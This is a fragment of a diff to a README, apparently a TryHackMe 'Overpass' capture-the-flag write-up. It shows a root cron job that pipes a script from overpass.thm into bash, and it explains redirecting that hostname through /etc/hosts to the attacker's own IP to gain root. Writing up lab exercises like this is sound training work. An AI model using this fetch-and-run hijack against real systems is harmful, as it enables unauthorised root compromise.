felixstrobel/tryhackme/overpass/README.md

 * * * * * <b>root curl overpass.thm/downloads/src/buildscript.sh | bash</b>
 </pre>

-<i>Ok he tries to fetch a file from overpass.thm.
-Maybe we can change the overpass.thm to point to our ip adress.
-To do so we have to edit the `/etc/hosts` file using nano.<br>
+<i>Ok, he tries to fetch a file from `overpass.thm`.
+Maybe we can change the `overpass.thm` to point to our own internal ip address.
+To do so we have to edit the `/etc/hosts` file using `nano`.<br>
 The full command looks like this: `nano /etc/hosts`<br>
 Then you have to edit the content to look like the following.
-The YOUR_IP should be your internal tryhackme adress.</i>
+The YOUR_IP should be your internal tryhackme vpn address.</i>

 <pre>
 127.0.0.1 localhost
 127.0.1.1 overpass-prod
-<b>YOUR_IP:8000 overpass.thm</b>
+<b>YOUR_IP overpass.thm</b>
 ::1     ip6-localhost ip6-loopback
 fe00::0 ip6-localnet
 ff00::0 ip6-mcastprefix